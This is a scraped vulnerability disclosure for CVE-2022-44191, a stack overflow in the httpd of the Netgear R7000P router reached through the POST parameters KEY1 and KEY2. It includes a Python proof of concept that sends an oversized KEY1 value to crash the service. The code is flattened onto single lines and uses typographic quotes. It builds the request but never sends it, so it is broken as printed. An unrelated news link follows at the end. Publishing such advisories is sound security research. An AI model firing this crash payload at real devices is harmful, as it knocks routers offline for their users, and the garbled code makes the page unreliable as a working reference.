

CVE-2022-44191: IoT_vuln/Netgear/R7000P/8 at main · RobinWang825/IoT_vuln

Netgear R7000P V1.3.1.64 is vulnerable to Buffer Overflow via parameters KEY1 and KEY2.


The stack overfow vulnerability is in /usr/sbin/httpd. The vulnerability occurrs in the sub_5835C function, which can be accessed via the URL

This function accepts the POST parameter KEY1 without verifying its length, and copies an unbounded stack with strcpy which will result in a stack overflow. This vulnerability allows an attacker to cause denial of service (DoS).

It also happened in parameter KEY2.

import socket import os

li = lambda x : print(‘\x1b[01;38;5;214m’ + x + ‘\x1b[0m’) ll = lambda x : print(‘\x1b[01;38;5;1m’ + x + ‘\x1b[0m’)

ip = ‘’ port = 80 r = socket.socket(socket.AF_INET, socket.SOCK_STREAM) r.connect((ip, port)) rn = b’\r\n’ p1 = b’a’ * 0x3000 p2 = b’KEY1=’ + p1 # payload p3 = b"POST /WLG_wireless_dual_band_r10.html" + b" HTTP/1.1" + rn p3 += b"Host:" + rn p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + rn p3 += b"Accept-Language: en-US,en;q=0.5" + rn p3 += b"Accept-Encoding: gzip, deflate" + rn p3 += b"Cookie: password=1111" + rn p3 += b"Connection: close" + rn p3 += b"Upgrade-Insecure-Requests: 1" + rn p3 += (b"Content-Length: %d" % len(p2)) +rn p3 += b’Content-Type: application/x-www-form-urlencoded’+rn p3 += rn p3 += p2


response = r.recv(4096) response = response.decode() li(response)

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda